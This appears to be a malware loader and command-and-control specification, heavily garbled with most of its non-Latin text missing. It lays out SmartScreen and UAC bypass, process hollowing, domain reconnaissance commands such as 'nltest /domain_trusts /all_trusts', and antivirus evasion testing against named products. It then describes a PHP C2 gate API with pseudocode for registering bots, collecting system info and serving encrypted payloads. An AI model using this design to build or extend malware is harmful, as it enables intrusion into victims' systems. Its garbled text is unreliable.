 , 



    ,    .
           .



      SmartScreen:
1.         https://lolbas-project.github.io/
2.  ,    (, .,    ,   .),
         ( ).
       ,   -     /     .
3.         

  

1.  
1.1.     ,    - 
2.      ,    IP-. ,    ,    :
           ,        .
  - hardware id (   ).    .
2.1.         ().      -       .
                 .
2.  x86/x64.   x64.      ,   .
3.    :
-  
-  
-    
-    
-   net view /all
-   net view /all /domain
-   nltest /domain_trusts /all_trusts
- IP-    -      
4.   
4.1.    .
5.   UAC
6.       :
6.1.     
6.2.     ( ,   ,    )
   :       ; ,    - ; ,     ,   .
        .
 ,            .
7.   .exe,   .dll
8.     (process hollowing, dll from memory   )
9.     
10.        C&C (HTTPS, DNS,  )
11.       (     cmd.exe  WerFault.exe,      )
12.  ;    .   -    , DPI.
      ,   ,             DPI.
13.     ( ,  ;     ).
        ,   :
13.1.      
13.2.     
13.3.       ,       .
          ID , hostname,   .
           - ,    .
14.   ,       .     .
15.  - Windows Server 2008 R2+, Windows Vista+  -    ,       .
     Windows Server 2008 ( R2,     XP),    .
16.    ,  (     .Net)      .
   .        (,           VMWare Player),      .
PowerShell -   2.0.
   cscript, jscript, .bat,      .

 ,     ,           ,      .Net  Microsoft Visual C++ Redistributable  .
17.    (  ):
17.1.      .exe,    .dll
17.2.   (,  1)
17.3.  CRT/STL (   ).


 

          ,      .
,         (VPS,  ).

0.    1 ()    ()   +     (.),      .
     .exe,    .dll -       .dll.
   .dll   rundll   .
     ,     /.
     .      .
      VPS. ,   V  VPS -  virtual ( ).
1.   dyncheck.com   .
2.   4        dyncheck.com.
 dyncheck: 240  ,    .
2.1.    
- Windows Defender
- ESET Nod32
- Avast Home
- Kaspersky Antivirus
- Bitdefender
3.        :
3.1. putty.exe
3.2. notepad.exe
3.3. DbgView.exe https://docs.microsoft.com/en-us/sysinternals/downloads/debugview
        .      MessageBox("hello, world!"),  ,
 . ,    WinApi ( GDI).   - ,       .
    - .
4.          (Windows Defender, ESET Nod32)    Windows  .
  ,   ,   .
    .
5.    " " (   ;   .exe -   .exe  )    qaz.im (  )   Chrome    .
        ,   .
6.  .        EV-     Chrome,   Chrome     ,     .
7.      .     -.
           /.

      ,     .
 ,     ,       ,   -         .
  ,     ,     .
      VPS   hardware id,        -.


  

  .
    PHP    .
   $adm   .
         PHP      (..     ).

     .

     HTTP     ,      HTTP-,       .
   ,     .
    HTTP,      .

 

1.  
$adm->register_property($plugin_name, $prop_name, $length)        
  $plugin_name:    
  $prop_name:      
  $length:        
TODO:             ( ).
       ( ,      -   ).
 true   , false   .

      ()  .       .

,          HTTP-, URI-    HTTP-,   .
      ,         ,    .
       .
    ,  , -   -        .


2.  
$adm->get_property($plugin_name, $prop_name, $group = null)   ()   ;   
  $plugin_name:    
  $prop_name:      
  $group:         (), .   ,        .
  .


3.   
$adm->get_groups($plugin_name)                                  ,    
  $plugin_name:    
  :
" " => "" {
   " 1" => " 1"
   ...
   " N" => " N"
}

3.  
$adm->get_payload($bitness, $group)                                
  $bitness:         86  64 (int)
  $group:        
 ,    

4.  
$adm->knock($group, $id = null)                                 
  $group:        
  $id:            ()
  .

5.    
$adm->put_sysinfo($group, $info, $id = null)                  
  $group:        
  $id:            ()
  $info:            .
   :
  hostname:     
  uname:        
  os:           
  os_bitness:   
  os_version:   
  av:             
  net:           net view /all
  netdomain:     net view /all /domain
  trust:         nltest /domain_trusts /all_trusts
 ,     - .
   .

6.  
$adm->put_telemetry($group, $data, $id = null)                
  $group:        
  $id:            ()
  $data:           


  -  ,     .
   :
-      
-      
-    (,    )
-     
-   

 

    -     API,       ,  .
  (  ),      (  error_reporting).

 

 -    PHP,     .
      ,      .
    :

1.   
$gate->install()
   ,  .

2.  
$gate->process_request($HTTP_request)
     .
  $HTTP_request:           
 :
  code =>              HTTP-  (  )
  response_headers =>  HTTP-  .    200,   .
  response_body =>     HTTP-  .    200,   .

    400 -         .
    404 -          ,       .
    200 -      ,     .
         ;        .

PHP

 PHP -   7.0.
     .
  -  -   .

   (PHP- )

require_once "adm_api.php";
//    $adm

class sample_gate {
string $plugin_name = "Plagin Vasi";

//     
//      ()
function install() {
    //   ()  -   - 
    // ,    ,       
    $adm->register_property($plugin_name, "RSA_public_key", 4096);
}

//   ,    HTTP-
//      ()
//      HTTP-,    
function process_request(string $request) {
    //       ,      
    array $groups = $adm->get_groups_list();

    //    ,   
    if(not valid request)
        return array("code=>"400");  // bad request;            

    foreach($g => $groups) {
        if(request matches this group) {
            $adm->knock($REMOTE_ADDR);
            if(request is telemetry)
                $adm->put_telemetry($g, $message_from_request);
            else if(this is sysinfo) {
                $info = get_sysinfo_from_request();
                $adm->put_sysinfo($g, $info);
            }
            else if(request for payload) {
                $bitness = figure out bitness from the request;
                $payload = $adm->get_payload($bitness, $g);
                $encryption_key = $adm->get_property($plugin_name, "RSA_public_key");
                $HTTP_body = encrypt_payload($payload, $encryption_key);
                $HTTP_headers = arrange_headers_somehow();
            }
            return array("code=>"200", "response_headers" => ...);
        }
    }

    return array("code=>"404");
}

//     ,      
function encrypt_payload() {}

function arrange_headers_somehow() {}
//etc
}
